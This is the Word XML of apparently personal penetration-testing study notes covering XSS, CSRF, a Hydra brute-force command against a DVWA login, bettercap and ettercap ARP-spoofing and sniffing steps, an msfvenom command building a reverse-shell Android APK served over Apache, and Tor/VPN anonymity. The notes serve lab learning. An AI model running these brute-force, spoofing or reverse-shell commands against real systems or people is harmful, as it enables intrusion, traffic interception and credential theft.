            <w:r w:rsidR="00FF752E" w:rsidRPr="00E828F1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">only work with a link with malicious </w:t>
            </w:r>
            <w:r w:rsidR="00B750C7" w:rsidRPr="00E828F1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>– Code injection</w:t>
            </w:r>
            <w:r w:rsidR="00267A9A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>(usually steal session and cookies)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B12326D" w14:textId="0FCF7B33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Stored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>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>–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script inject</w:t>
            </w:r>
            <w:r w:rsidR="00BD629B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"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(just visit website) – that is stored in the server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50A378F2" w14:textId="01055469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DOM XSS</w:t>
            </w:r>
            <w:r w:rsidR="00256748">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498F429D" w14:textId="72A0DE2F" w:rsidR="00B37109" w:rsidRDefault="00B37109" w:rsidP="009E14E3"/>
          <w:p w14:paraId="2078A9B6" w14:textId="50136FAD" w:rsidR="00DB491A" w:rsidRDefault="00DB491A" w:rsidP="009E14E3"/>
          <w:p w14:paraId="14B02168" w14:textId="43FE594A" w:rsidR="00DB491A" w:rsidRDefault="00DB491A" w:rsidP="009E14E3"/>
          <w:p w14:paraId="0FB442CE" w14:textId="117380ED" w:rsidR="00DB491A" w:rsidRDefault="00DB491A" w:rsidP="009E14E3"/>
          <w:p w14:paraId="1725BE65" w14:textId="77777777" w:rsidR="00DB491A" w:rsidRDefault="00DB491A" w:rsidP="009E14E3"/>
          <w:p w14:paraId="1FCEC114" w14:textId="77777777" w:rsidR="00B37109" w:rsidRDefault="00B37109" w:rsidP="009E14E3"/>
          <w:p w14:paraId="158D67BE" w14:textId="78B17EDE" w:rsidR="00B37109" w:rsidRDefault="00B37109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160A476C" w:rsidR="009E14E3" w:rsidRDefault="00E35EAE" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">Python -m </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SimpleHTTPServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F30EB2">
              <w:t>{PORT}</w:t>
            </w:r>
          </w:p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29F38741" w:rsidR="009E14E3" w:rsidRDefault="000F56F7" w:rsidP="00E15CBD">
            <w:r>
              <w:t>CSRF – Cross Site Request Forgery</w:t>
            </w:r>
          </w:p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A208C0" w14:paraId="6410F07C" w14:textId="77777777" w:rsidTr="00134A0C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="34FCDF58" w14:textId="30A7817B" w:rsidR="00A208C0" w:rsidRDefault="00A208C0" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">Brute Force Attack – Using </w:t>
            </w:r>
            <w:r w:rsidRPr="00A208C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>HYDRA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B46FC3" w14:paraId="0072C714" w14:textId="77777777" w:rsidTr="00341670">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="432513BB" w14:textId="5D259AA7" w:rsidR="00B46FC3" w:rsidRDefault="00B46FC3" w:rsidP="00E15CBD">
            <w:r w:rsidRPr="00B46FC3">
              <w:t>hydra 192.168.1.75 http-form-post "/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;Login=submit:Login failed" -L usernames.txt -P passwords.txt</w:t>
            </w:r>
          </w:p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751059" w14:paraId="02331C5E" w14:textId="77777777" w:rsidTr="00BE010F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="124F2B0C" w14:textId="27BC0B09" w:rsidR="00751059" w:rsidRPr="002E63C1" w:rsidRDefault="00751059" w:rsidP="00751059">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E63C1">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t>Man In The Middle Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63C1" w14:paraId="56CFC62A" w14:textId="77777777" w:rsidTr="00E91039">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="46521A82" w14:textId="5BE08AFA" w:rsidR="002E63C1" w:rsidRDefault="002E63C1" w:rsidP="002E63C1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="1330A494" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="220C2137" w14:textId="320F69F7" w:rsidR="00F95A4D" w:rsidRDefault="00F95A4D" w:rsidP="00E15CBD">
            <w:r>
              <w:t>NOTE: Need to be ROOT USER</w:t>
            </w:r>
            <w:r w:rsidR="00ED4198">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00ED4198" w:rsidRPr="00ED4198">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">You need install </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00ED4198" w:rsidRPr="00ED4198">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>bettercap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00ED4198" w:rsidRPr="00ED4198">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> in Kali</w:t>
            </w:r>
            <w:r w:rsidR="00ED4198">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48AFA807" w14:textId="79E00426" w:rsidR="009E14E3" w:rsidRDefault="00C145BC" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">&gt;apt-get install </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>betterca</w:t>
            </w:r>
            <w:r w:rsidR="007C09D9">
              <w:t>p</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6052D3AF" w14:textId="57BE4C0E" w:rsidR="00CF6717" w:rsidRDefault="00CF6717" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bettercap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1708853E" w14:textId="6EB05DB6" w:rsidR="00DF2620" w:rsidRDefault="002024AD" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;help</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F080DF8" w14:textId="51746556" w:rsidR="00DB0FFD" w:rsidRDefault="00FB0E91" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidR="007A6632">
              <w:t xml:space="preserve">help </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007A6632">
              <w:t>net.probe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7960756C" w14:textId="678F6C36" w:rsidR="00ED3085" w:rsidRDefault="00EA7332" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>net.probe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> on</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04374224" w14:textId="63ED683E" w:rsidR="002905F3" w:rsidRDefault="002905F3" w:rsidP="00E15CBD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">&gt;help </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>arp.spoof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="49433BC1" w14:textId="12A884CA" w:rsidR="002905F3" w:rsidRDefault="00D31553" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">&gt;set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>arp.spoof.fullduplex</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65FAE3B7" w14:textId="3ECC8FB2" w:rsidR="00051B30" w:rsidRDefault="00051B30" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">&gt;set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>arp.spoof.targets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43F65C9B" w14:textId="16E5CB1D" w:rsidR="0023394C" w:rsidRDefault="0023394C" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00975A32">
              <w:t>help</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08ADD641" w14:textId="29719868" w:rsidR="00975A32" w:rsidRDefault="00975A32" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">&gt;set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>net.sniff.local</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="682C30ED" w14:textId="6EBEFD2F" w:rsidR="00BA0749" w:rsidRDefault="00BA0749" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>arp.spoof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> on</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3003DC4D" w14:textId="21BD48DB" w:rsidR="00BA0749" w:rsidRDefault="00BA0749" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>net.sniff</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> on</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="157005A6" w14:textId="05957DE3" w:rsidR="00ED3085" w:rsidRDefault="00ED3085" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="530B1301" w14:textId="117E7DFB" w:rsidR="00ED3085" w:rsidRDefault="00ED3085" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="3CB3BFBB" w14:textId="56CF2F97" w:rsidR="002E62CE" w:rsidRDefault="002E62CE" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="656198B5" w14:textId="22B07C9F" w:rsidR="002E62CE" w:rsidRDefault="00F55FC5" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">Note: If you want to run previous – You need to create a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sniff.cap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7946058E" w14:textId="7A005AE7" w:rsidR="002E62CE" w:rsidRDefault="002E62CE" w:rsidP="002E62CE">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bettercap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>iface</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> eth0 -caplet </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sniff.cap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6A89676E" w14:textId="3451E2AB" w:rsidR="00ED3085" w:rsidRDefault="00ED3085" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="44718FB0" w14:textId="77777777" w:rsidR="00ED3085" w:rsidRDefault="00ED3085" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="4DB58C2B" w14:textId="48CF3E63" w:rsidR="00DB0FFD" w:rsidRDefault="00DB0FFD" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="519943F7" w14:textId="7FD13910" w:rsidR="00DB0FFD" w:rsidRDefault="00DB0FFD" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="18870EF4" w14:textId="77777777" w:rsidR="00DB0FFD" w:rsidRDefault="00DB0FFD" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="54039D9D" w14:textId="77777777" w:rsidR="00DF2620" w:rsidRDefault="00DF2620" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="258963D6" w14:textId="77777777" w:rsidR="00DF2620" w:rsidRDefault="00DF2620" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="68C805BF" w14:textId="77777777" w:rsidR="00DF2620" w:rsidRDefault="00DF2620" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="5231A72F" w14:textId="77777777" w:rsidR="00DF2620" w:rsidRDefault="00DF2620" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="7BF22A65" w14:textId="5C916DE4" w:rsidR="00DF2620" w:rsidRDefault="00DF2620" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14516F89" w14:textId="3CC79253" w:rsidR="002040D3" w:rsidRDefault="002040D3" w:rsidP="002040D3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4F455DF5" w14:textId="77777777" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>Alternative: ETTERCAP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333257BF" w14:textId="77777777" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>&gt;cat /proc/sys/net/ipv4/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip_forward</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2D5D08C3" w14:textId="77777777" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>Note: If its enable packet forwarding 0 or 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6525FA87" w14:textId="77777777" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B"/>
          <w:p w14:paraId="3A9470AB" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>&gt;echo 1 &gt; /proc/sys/net/ipv4/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip_forward</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="535AB42B" w14:textId="77777777" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B"/>
          <w:p w14:paraId="03EDCD14" w14:textId="4AC8B20E" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>Note: To start</w:t>
            </w:r>
            <w:r w:rsidR="007D5929">
              <w:t>, It will pop a window</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34671420" w14:textId="4ACE425A" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B">
            <w:r>
              <w:t>&gt;Ettercap -G</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D4643D" w14:textId="2016676E" w:rsidR="005F03BF" w:rsidRDefault="005F03BF" w:rsidP="00BC695B"/>
          <w:p w14:paraId="168AB6B0" w14:textId="628F3B9A" w:rsidR="005F03BF" w:rsidRDefault="005F03BF" w:rsidP="00BC695B"/>
          <w:p w14:paraId="2BEE6F98" w14:textId="753BDC3A" w:rsidR="005F03BF" w:rsidRDefault="005F03BF" w:rsidP="00BC695B"/>
          <w:p w14:paraId="147C9E40" w14:textId="0BCFB66C" w:rsidR="005F03BF" w:rsidRDefault="005F03BF" w:rsidP="00BC695B"/>
          <w:p w14:paraId="3A96176A" w14:textId="77777777" w:rsidR="005F03BF" w:rsidRDefault="005F03BF" w:rsidP="00BC695B"/>
          <w:p w14:paraId="79F102C1" w14:textId="59BEB335" w:rsidR="00BC695B" w:rsidRDefault="00BC695B" w:rsidP="00BC695B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692299E1" w:rsidR="009E14E3" w:rsidRDefault="003E1086" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">Can code using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>scapy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> instead of python</w:t>
            </w:r>
          </w:p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AE4818" w14:paraId="68ED0D52" w14:textId="77777777" w:rsidTr="001F30FF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="136370DA" w14:textId="1B0012C9" w:rsidR="00AE4818" w:rsidRDefault="00AE4818" w:rsidP="00AE4818">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE4818">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Android Hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="02AB4150" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E206E43" w14:textId="27EDB82D" w:rsidR="009E14E3" w:rsidRDefault="0050143B" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">Download in VM </w:t>
            </w:r>
            <w:hyperlink r:id="rId5" w:history="1">
              <w:r w:rsidRPr="009E7163">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.osboxes.org/android-x86/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6924F07B" w14:textId="3BCFCE0C" w:rsidR="0050143B" w:rsidRDefault="0050143B" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BB2BDBA" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="00A06B0F" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p android/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  <w:r>
              <w:t xml:space="preserve"> LHOST={YOURIPADDRESS} LPORT=5555 -o </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shell.apk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4C14E9A0" w14:textId="77777777" w:rsidR="00C13E70" w:rsidRDefault="00C13E70" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="7528E3D0" w14:textId="2F873B1D" w:rsidR="00C13E70" w:rsidRDefault="00C13E70" w:rsidP="00E15CBD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service apache2 start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10747FF5" w14:textId="77777777" w:rsidR="00C13E70" w:rsidRDefault="00C13E70" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="492A9BE3" w14:textId="3CB8968D" w:rsidR="00C13E70" w:rsidRDefault="00C13E70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357D92" w14:paraId="0B54BC8F" w14:textId="77777777" w:rsidTr="00E80639">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="537D5C8F" w14:textId="3DDB3972" w:rsidR="00357D92" w:rsidRDefault="00357D92" w:rsidP="00EC3DBB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC3DBB">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Using Evil Twin Android</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="64A93644" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CD26EEC" w14:textId="06DBD1CB" w:rsidR="009E14E3" w:rsidRDefault="00662DF4" w:rsidP="00E15CBD">
            <w:r>
              <w:t>Search in google- evil droid(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Github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124976" w14:paraId="6FDC81EE" w14:textId="77777777" w:rsidTr="00A97A33">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1FB14CD0" w14:textId="1FE57E44" w:rsidR="00124976" w:rsidRDefault="00124976" w:rsidP="00E15CBD">
            <w:r>
              <w:t>More like Social Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="564C0544" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79717467" w14:textId="15EEB0D1" w:rsidR="009E14E3" w:rsidRDefault="00124976" w:rsidP="00E15CBD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>apktool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p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7C7D90" w14:paraId="3025C01D" w14:textId="77777777" w:rsidTr="00A96F47">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="0BBEC204" w14:textId="08B2F195" w:rsidR="007C7D90" w:rsidRPr="007C7D90" w:rsidRDefault="007C7D90" w:rsidP="007C7D90">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C7D90">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t>Anonymity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="3C5D8BCC" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23C4544F" w14:textId="663C445D" w:rsidR="009E14E3" w:rsidRDefault="00A734E7" w:rsidP="00E15CBD">
            <w:r>
              <w:t>Browsers:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31179B72" w14:textId="33E63221" w:rsidR="00A734E7" w:rsidRDefault="00A734E7" w:rsidP="00A734E7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Tor Browsers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E4B0CC" w14:textId="69567801" w:rsidR="00A734E7" w:rsidRDefault="00F56091" w:rsidP="00A734E7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>VPN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3546BD5E" w14:textId="633D18A1" w:rsidR="00F56091" w:rsidRDefault="00F56091" w:rsidP="00A734E7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Proxy</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DE82063" w14:textId="77777777" w:rsidR="00A734E7" w:rsidRDefault="00A734E7" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="7985D57B" w14:textId="77777777" w:rsidR="00A734E7" w:rsidRDefault="00A734E7" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="3347D5E7" w14:textId="5D2F4563" w:rsidR="00A734E7" w:rsidRDefault="00A734E7" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DA3B8AC" w14:textId="77777777" w:rsidR="00E06C01" w:rsidRDefault="00E06C01" w:rsidP="00E06C01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44B0DB80" w14:textId="77777777" w:rsidR="00E06C01" w:rsidRDefault="00E06C01" w:rsidP="00E06C01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apt-get install tor </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>torbrowser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-launcher</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D144A90" w14:textId="77777777" w:rsidR="00832C8F" w:rsidRDefault="00832C8F" w:rsidP="00E06C01">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>torbrowser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-launcher</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FE7A44C" w14:textId="77777777" w:rsidR="00D36425" w:rsidRDefault="00D36425" w:rsidP="00E06C01"/>
          <w:p w14:paraId="4BFB5FF5" w14:textId="77777777" w:rsidR="00D36425" w:rsidRDefault="00D36425" w:rsidP="00E06C01">
            <w:r>
              <w:t xml:space="preserve">NOTE: Check if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>your</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> really running the TOR website</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="764E544B" w14:textId="7B804BBA" w:rsidR="00D36425" w:rsidRDefault="00D36425" w:rsidP="00E06C01">
            <w:r>
              <w:t>NOTE: on the URL link</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03E607B3" w14:textId="4362A7BA" w:rsidR="00D36425" w:rsidRDefault="00D36425" w:rsidP="00E06C01">
            <w:r>
              <w:t>&gt;https://torproject.org</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D56435A" w14:textId="77777777" w:rsidR="00D36425" w:rsidRDefault="00D36425" w:rsidP="00E06C01"/>
          <w:p w14:paraId="663A1DF4" w14:textId="77777777" w:rsidR="00D36425" w:rsidRDefault="00D36425" w:rsidP="00E06C01"/>
          <w:p w14:paraId="65E5CFB0" w14:textId="2162CC08" w:rsidR="00D36425" w:rsidRDefault="00D36425" w:rsidP="00E06C01"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="526A8782" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65BE10A2" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="00285A9D" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;</w:t>
            </w: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openvpn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
